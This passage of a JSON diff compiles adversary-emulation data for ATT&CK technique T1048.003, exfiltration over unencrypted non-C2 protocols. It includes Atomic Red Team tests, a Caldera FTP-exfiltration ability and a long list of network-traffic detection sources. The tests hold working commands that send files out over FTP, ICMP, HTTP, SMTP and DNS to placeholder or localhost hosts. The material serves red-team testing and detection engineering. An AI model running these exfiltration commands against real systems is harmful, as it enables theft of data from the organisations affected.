-SmtpServer #{smtp_server}\n", + "source": "atomics/T1048.003/T1048.003.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol" + }, + { + "command": "Send-MailMessage -From #{sender} -To #{receiver} -Subject \"T1048.003 Atomic Test\" -Attachments #{input_file} -SmtpServer 127.0.0.1\n", + "source": "atomics/T1048.003/T1048.003.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol" + }, + { + "command": "$Dir_to_copy = \"$env:windir\\temp\"\n$ftp = \"ftp://127.0.0.1/\"\n$web_client = New-Object System.Net.WebClient\n$web_client.Credentials = New-Object System.Net.NetworkCredential('#{username}', '#{password}')\nif (test-connection -count 1 -computername \"127.0.0.1\" -quiet)\n{foreach($file in (dir $Dir_to_copy \"*.7z\"))\n{echo \"Uploading $file...\"\n$uri = New-Object System.Uri($ftp+$file.name)\n$web_client.UploadFile($uri, $file.FullName)}}\nelse\n{echo \"FTP Server Unreachable. Please verify the server address in input args and try again.\"}\n", + "source": "atomics/T1048.003/T1048.003.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol" + }, + { + "command": null, + "source": "atomics/T1048.003/T1048.003.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol" + }, + { + "command": "LocalFile='#{host.dir.compress}';\nRemoteName=\"$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename $LocalFile)\";\ncurl -T #{host.dir.compress} ftp://#{ftp.server.address}/$RemoteName --user #{ftp.user.name}:'#{ftp.user.password}'\n", + "source": "data/abilities/exfiltration/d754878c-17dd-46dc-891c-a993f8a10336.yml", + "name": "This ability exfiltrates a compressed archive to an FTP server." + }, + { + "command": "$SourceFile = (Get-Item #{host.dir.compress});\n$RemoteName = \"$(Get-Date -Format yyyymmddhhmmss)-exfil-#{paw}-$($SourceFile.name)\";\n$ftp = [System.Net.FtpWebRequest]::Create(\"ftp://#{ftp.server.address}/$RemoteName\");\n$ftp = [System.Net.FTPWebRequest]$ftp;\n$ftp.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile;\n$ftp.Credentials = New-Object System.Net.NetworkCredential(\"#{ftp.user.name}\", \"#{ftp.user.password}\");\n$ftp.UseBinary = $true;\n$ftp.UsePassive = $true;\n\n$content = [System.IO.File]::ReadAllBytes(\"#{host.dir.compress}\");\n$ftp.ContentLength = $content.Length;\n$requestStream = $ftp.GetRequestStream();\n$requestStream.Write($content, 0, $content.Length);\n\n$requestStream.Close();\n$requestStream.Dispose();\n", + "source": "data/abilities/exfiltration/d754878c-17dd-46dc-891c-a993f8a10336.yml", + "name": "This ability exfiltrates a compressed archive to an FTP server." + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1048.003", + "display_name": "Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol", + "atomic_tests": [ + { + "name": "Exfiltration Over Alternative Protocol - HTTP", + "auto_generated_guid": "1d1abbd6-a3d3-4b2e-bef5-c59293f46eff", + "description": "A firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337.\n\nUpon successful execution, sh will be used to make a directory (/tmp/victim-staging-area), write a txt file, and host the directory with Python on port 1337, to be later downloaded.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "executor": { + "steps": "1. Victim System Configuration:\n\n mkdir /tmp/victim-staging-area\n echo \"this file will be exfiltrated\" > /tmp/victim-staging-area/victim-file.txt\n\n2. Using Python to establish a one-line HTTP server on victim system:\n\n cd /tmp/victim-staging-area\n python -m SimpleHTTPServer 1337\n\n3. To retrieve the data from an adversary system:\n\n wget http://VICTIM_IP:1337/victim-file.txt\n", + "name": "manual" + } + }, + { + "name": "Exfiltration Over Alternative Protocol - ICMP", + "auto_generated_guid": "dd4b4421-2e25-4593-90ae-7021947ad12e", + "description": "Exfiltration of specified file over ICMP protocol.\n\nUpon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be via stdout.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "input_file": { + "description": "Path to file to be exfiltrated.", + "type": "Path", + "default": "C:\\Windows\\System32\\notepad.exe" + }, + "ip_address": { + "description": "Destination IP address where the data should be sent.", + "type": "String", + "default": "127.0.0.1" + } + }, + "executor": { + "command": "$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send(\"#{ip_address}\", 1500, $Data) }\n", + "name": "powershell" + } + }, + { + "name": "Exfiltration Over Alternative Protocol - DNS", + "auto_generated_guid": "c403b5a4-b5fc-49f2-b181-d1c80d27db45", + "description": "Exfiltration of specified file over DNS protocol.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "steps": "1. On the adversary machine run the below command.\n\n tshark -f \"udp port 53\" -Y \"dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches \".domain\"\" >> received_data.txt\n\n2. On the victim machine run the below commands.\n\n xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done\n \n3. Once the data is received, use the below command to recover the data.\n\n cat output_file | cut -d \"A\" -f 2 | cut -d \" \" -f 2 | cut -d \".\" -f 1 | sort | uniq | xxd -p -r\n", + "name": "manual" + } + }, + { + "name": "Exfiltration Over Alternative Protocol - HTTP", + "auto_generated_guid": "6aa58451-1121-4490-a8e9-1dada3f1c68c", + "description": "Exfiltration of specified file over HTTP.\nUpon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$content = Get-Content #{input_file}\nInvoke-WebRequest -Uri #{ip_address} -Method POST -Body $content\n", + "name": "powershell" + }, + "input_arguments": { + "input_file": { + "description": "Path to file to exfiltrate", + "type": "Path", + "default": "C:\\Windows\\System32\\notepad.exe" + }, + "ip_address": { + "description": "Destination IP address where the data should be sent", + "type": "String", + "default": "http://127.0.0.1" + } + } + }, + { + "name": "Exfiltration Over Alternative Protocol - SMTP", + "auto_generated_guid": "ec3a835e-adca-4c7c-88d2-853b69c11bb9", + "description": "Exfiltration of specified file over SMTP.\nUpon successful execution, powershell will send an email with attached file to exfiltrateto a remote address. Results will be via stdout.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Send-MailMessage -From #{sender} -To #{receiver} -Subject \"T1048.003 Atomic Test\" -Attachments #{input_file} -SmtpServer #{smtp_server}\n", + "name": "powershell" + }, + "input_arguments": { + "input_file": { + "description": "Path to file to exfiltrate", + "type": "Path", + "default": "C:\\Windows\\System32\\notepad.exe" + }, + "sender": { + "description": "The email address of the sender", + "type": "String", + "default": "test@corp.com" + }, + "receiver": { + "description": "The email address of the receiver", + "type": "String", + "default": "test@corp.com" + }, + "smtp_server": { + "description": "SMTP server to use for email transportation", + "type": "String", + "default": "127.0.0.1" + } + } + }, + { + "name": "MAZE FTP Upload", + "auto_generated_guid": "57799bc2-ad1e-4130-a793-fb0c385130ba", + "description": "This test simulates MAZE's ransomware's ability to exfiltrate data via FTP.\nUpon successful execution, all 7z files within the %windir%\\temp directory will be uploaded to a remote FTP server. \nReference: https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "ftp_server": { + "description": "FTP Server address", + "type": "String", + "default": "127.0.0.1" + }, + "username": { + "description": "Username for FTP server login", + "type": "String", + "default": null + }, + "password": { + "description": "Password for FTP server login", + "type": "String", + "default": null + } + }, + "executor": { + "command": "$Dir_to_copy = \"$env:windir\\temp\"\n$ftp = \"ftp://#{ftp_server}/\"\n$web_client = New-Object System.Net.WebClient\n$web_client.Credentials = New-Object System.Net.NetworkCredential('#{username}', '#{password}')\nif (test-connection -count 1 -computername \"#{ftp_server}\" -quiet)\n{foreach($file in (dir $Dir_to_copy \"*.7z\"))\n{echo \"Uploading $file...\"\n$uri = New-Object System.Uri($ftp+$file.name)\n$web_client.UploadFile($uri, $file.FullName)}}\nelse\n{echo \"FTP Server Unreachable. Please verify the server address in input args and try again.\"}\n", + "cleanup_command": "$ftp = \"ftp://#{ftp_server}/\"\ntry {foreach ($file in (dir \"$env:windir\\temp\" \"*.7z\"))\n{$uri = New-Object System.Uri($ftp+$file.name)\n $ftp_del = [System.Net.FtpWebRequest]::create($uri)\n $ftp_del.Credentials = New-Object System.Net.NetworkCredential('#{username}','#{password}')\n $ftp_del.Method = [System.Net.WebRequestMethods+Ftp]::DeleteFile\n $ftp_del.GetResponse()}} catch{}\n", + "name": "powershell" + } + } + ] + }, + { + "id": "d754878c-17dd-46dc-891c-a993f8a10336", + "name": "Exfil Compressed Archive to FTP Server", + "description": "This ability exfiltrates a compressed archive to an FTP server.", + "tactic": "exfiltration", + "technique": { + "attack_id": "T1048.003", + "name": "Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol" + }, + "platforms": { + "linux": { + "sh": { + "command": "LocalFile='#{host.dir.compress}';\nRemoteName=\"$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename $LocalFile)\";\ncurl -T #{host.dir.compress} ftp://#{ftp.server.address}/$RemoteName --user #{ftp.user.name}:'#{ftp.user.password}'\n" + } + }, + "windows": { + "psh": { + "command": "$SourceFile = (Get-Item #{host.dir.compress});\n$RemoteName = \"$(Get-Date -Format yyyymmddhhmmss)-exfil-#{paw}-$($SourceFile.name)\";\n$ftp = [System.Net.FtpWebRequest]::Create(\"ftp://#{ftp.server.address}/$RemoteName\");\n$ftp = [System.Net.FTPWebRequest]$ftp;\n$ftp.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile;\n$ftp.Credentials = New-Object System.Net.NetworkCredential(\"#{ftp.user.name}\", \"#{ftp.user.password}\");\n$ftp.UseBinary = $true;\n$ftp.UsePassive = $true;\n\n$content = [System.IO.File]::ReadAllBytes(\"#{host.dir.compress}\");\n$ftp.ContentLength = $content.Length;\n$requestStream = $ftp.GetRequestStream();\n$requestStream.Write($content, 0, $content.Length);\n\n$requestStream.Close();\n$requestStream.Dispose();\n" + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.dir.compress" + } + ] + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as 